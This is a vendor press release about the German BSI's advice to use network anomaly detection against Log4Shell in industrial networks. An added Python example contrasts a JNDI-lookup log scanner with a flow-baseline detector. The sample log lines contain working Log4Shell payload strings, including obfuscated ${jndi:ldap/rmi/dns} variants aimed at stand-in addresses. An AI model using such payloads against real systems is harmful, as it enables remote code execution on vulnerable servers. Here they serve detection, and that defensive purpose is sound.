Why the BSI recommends anomaly detection to identify Log4Shell-related attacks

In its working paper »Critical Vulnerability in Log4j – Detection and Response«, the German Federal Office for Information Security (BSI) underlines the persistent and complex danger of the Log4Shell vulnerability in industrial networks as well. Patching the vulnerability in the short to medium term is considered unrealistic for many companies. For this reason, the BSI recommends continuous monitoring and analysis of network communication via anomaly detection in addition to rule-based analysis of request data. Industrial anomaly detection solutions, as offered by Rhebo, a Landis+Gyr Company, enable companies to detect compromises that have already occurred, active exploits and other malicious activities in operational technology (OT) and industrial control systems (ICS) at an early stage. The vulnerability, documented as CVE-2021-44228, allows unauthenticated attackers to execute arbitrary code on any system that logs attacker-controlled input through the widely used Log4j library.

Fast and complete security patching unlikely

»Naturally, the first priority is to update all existing Log4j libraries in the company to the most recent version. However, many companies are thus embarking on the proverbial search for the needle in the haystack,« said Rhebo CTO Martin Menschner. Companies often lack clarity over which applications use the vulnerable library. Moreover, as the BSI explicitly points out, it is not sufficient to update the Log4j library via the global software management of operating systems. They stress the point that only the respective »software manufacturers who have integrated the library into their programs [can] carry out the update.« Mitigation is further complicated by the fact that Log4j has already been updated several times since the vulnerability became known.

In addition, according to the BSI, all known mitigation measures that affect the use of the library are currently based on disabling the problematic functionality. Systems that depend on that functionality of the Log4j library thus risk no longer working once the mitigation is applied. Particularly companies providing critical services, for example critical infrastructures and industrial companies, find themselves in a catch-22 situation.

Moreover, companies should not be lulled into a sense of security even after an update. »The Log4Shell vulnerability could already have been exploited in some companies. This means that adversaries might have already compromised IT or – via lateral movement – Operational Technology (OT) networks and established access via backdoors,« adds Martin Menschner. After all, the vulnerable code had existed for years before disclosure: the JNDI lookup feature at the root of Log4Shell has been part of Log4j 2 since version 2.0-beta9 in 2013. And security organizations worldwide have observed a massive increase in network scans and attacks since Log4Shell officially became known in December 2021 (see also Rhebo’s commentary on Log4Shell).

Anomaly detection should be a priority

For these reasons, the BSI recommends that organizations immediately implement enhanced measures to detect suspicious and malicious communications. In addition to the evaluation of request data (e.g., via web server logs), the BSI explicitly mentions anomaly detection at the network level. »This solution not only detects previously unknown attack patterns typical of zero-day vulnerabilities,« added Martin Menschner. »It also reports operations that indicate existing compromises, such as lateral movement, scans, change of functions and command structures in systems.« Rhebo’s Next Generation OT Intrusion Detection offers a solution tailored specifically to Operational Technology networks and Industrial Control Systems.

Rhebo’s OT monitoring observes all communication within an industrial network, while the integrated Threat and Intrusion Detection identifies any anomaly, i.e. deviation, in the communication behavior and reports it in real time. It detects any communication that is novel or unusual in the monitored network and indicative of malicious behavior – from backdoor communications, lateral movement and spoofing activities to direct interference with industrial processes. With anomaly detection, actions of adversaries within the OT network become visible, traceable, and can be mitigated in real time, even if no signature exists for the technique used or the adversary has hijacked authenticated user accounts. To get anomaly detection up and running quickly, Rhebo offers on-demand technical operational support as well as a comprehensive managed protection service. To assess whether a network compromise has already occurred, an OT risk assessment and security analysis is also recommended.
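The two detection approaches the BSI recommends, request-data (web server log) evaluation and network-level anomaly detection, are illustrated side by side in the added example below. It is not code from Rhebo, the BSI or the original release; all access log lines and flow records are constructed sample data (using the documentation address ranges 203.0.113.0/24 and 198.51.100.0/24), and the Modbus/historian flow layout is an assumed toy OT network. The log scanner collapses the nesting tricks that Log4j’s lookup engine resolves (`${lower:j}`, `${::-j}`, URL encoding) before it looks for `${jndi:`, which is what a naive string match misses; the flow check needs no signature at all and simply reports connections never seen during a learning phase, such as an OT host opening LDAP to an external address.

```python
"""Added illustration: signature-based Log4Shell (CVE-2021-44228) detection in
web server logs versus baseline anomaly detection over network flows.
All log lines and flow records are constructed sample data."""
import re
from urllib.parse import unquote

# Obfuscation layers that Log4j's lookup engine resolves before the JNDI lookup:
#   ${lower:j} / ${upper:J}  -> j        ${env:NOPE:-j} and ${::-j} -> j
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.I)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{jndi:([a-z]+):", re.I)

# Combined log format: ip ident user [ts] "request" status bytes "referer" "user-agent"
_ACCESS_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" \d+ \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)


def normalize_payload(text: str, max_rounds: int = 10) -> str:
    """URL-decode, then repeatedly collapse nested lookups the way Log4j would."""
    s = unquote(text)
    for _ in range(max_rounds):
        new = _DEFAULT_LOOKUP.sub(r"\1", _CASE_LOOKUP.sub(r"\1", s))
        if new == s:
            break
        s = new
    return s


def find_jndi(text: str):
    """Return the JNDI scheme (ldap, rmi, dns, ...) if a lookup is present, else None."""
    m = _JNDI.search(normalize_payload(text))
    return m.group(1).lower() if m else None


def scan_access_log(lines):
    """Rule-based detection: flag lines whose request line, Referer or User-Agent
    carries a JNDI lookup. Returns (line_no, client_ip, field, scheme) tuples."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = _ACCESS_LINE.match(line)
        if not m:
            continue
        for field in ("req", "ref", "ua"):
            scheme = find_jndi(m.group(field))
            if scheme:
                hits.append((n, m.group("ip"), field, scheme))
                break
    return hits


def learn_baseline(flows):
    """Anomaly detection, learning phase: record every (src, dst, port) seen
    during a known-good period of the (assumed) OT network."""
    return {(src, dst, port) for src, dst, port in flows}


def detect_new_flows(baseline, flows):
    """Report any connection absent from the baseline, regardless of payload.
    Outbound LDAP/RMI from an OT host to an unknown address is the classic
    Log4Shell callback and needs no signature to stand out."""
    return [f for f in flows if f not in baseline]


SAMPLE_ACCESS_LOG = [  # constructed sample lines
    '10.0.0.5 - - [11/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [11/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '198.51.100.4 - - [11/Dec/2021:10:00:03 +0000] "GET /?q=${${lower:j}ndi:${lower:r}mi://198.51.100.4/x} HTTP/1.1" 400 0 "-" "curl/7.79.1"',
    '198.51.100.9 - - [11/Dec/2021:10:00:04 +0000] "GET / HTTP/1.1" 200 512 "%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3Adns%3A%2F%2Fx.198.51.100.9%2Fa%7D" "Mozilla/5.0"',
]

BASELINE_FLOWS = [  # constructed learning phase: HMI -> PLC (Modbus), HMI -> historian, historian -> IT
    ("192.168.10.5", "192.168.10.20", 502),
    ("192.168.10.5", "192.168.10.30", 1433),
    ("192.168.10.30", "192.168.1.10", 443),
]
LIVE_FLOWS = [  # constructed live traffic
    ("192.168.10.5", "192.168.10.20", 502),      # known HMI -> PLC
    ("192.168.10.30", "203.0.113.7", 1389),      # historian calling out to LDAP: JNDI callback
    ("192.168.10.30", "192.168.10.20", 502),     # historian speaking Modbus to the PLC: lateral movement
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_ACCESS_LOG):
        print("signature hit:", hit)
    for flow in detect_new_flows(learn_baseline(BASELINE_FLOWS), LIVE_FLOWS):
        print("new flow:", flow)
```

The first half only catches what the rules anticipate; a fresh encoding trick the normaliser does not collapse slips through. The second half reports the two flows not in the baseline without knowing anything about Log4j, which is the point the BSI makes about anomaly detection against zero-day exploitation and post-compromise lateral movement. In practice the baseline would come from weeks of captured OT traffic rather than three tuples.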

For more information on the Rhebo OT anomaly detection please visit https://rhebo.com/en/our-products/rhebo-industrial-protector/

About Rhebo GmbH

Rhebo develops and markets innovative industrial monitoring solutions and services for energy suppliers, industrial companies and critical infrastructures. The company enables its customers to guarantee both cybersecurity and the availability of their OT and IoT infrastructures and thus master the complex challenges of securing industrial networks and smart infrastructures. Since 2021, Rhebo has been part of Landis+Gyr AG, a leading global provider of integrated energy management solutions for the energy industry with around 5,000 employees in over 30 countries worldwide.

Rhebo is a partner of the Alliance for Cyber Security of the Federal Office for Information Security and is actively involved in Teletrust – IT Security Association Germany and Bitkom Working Group on Security Management for the development of security standards. https://rhebo.com/

Company contact and publisher of this release:

Rhebo GmbH
Spinnereistr. 7
04179 Leipzig
Phone: +49 (341) 393790-180
Fax: +49 (341) 393790-0
http://www.rhebo.com

Contact:
Jens Pacholsky
Public Relations
Phone: +49 (341) 393790191
E-Mail: jens.pacholsky@rhebo.com
The publisher named above (see company contact) is solely responsible for the press release above. It is generally also the author of the press text and of the attached image, audio, video, media and information materials. United News Network GmbH accepts no liability for the correctness or completeness of the release presented. In the case of transmission errors or other disruptions, it is liable only in cases of intent or gross negligence. Use of the information archived here for one's own information and for editorial reprocessing is generally free of charge. Please clarify copyright questions with the named publisher before any further use. Systematic storage of this data and use of parts of this database work are permitted only with the written consent of United News Network GmbH.
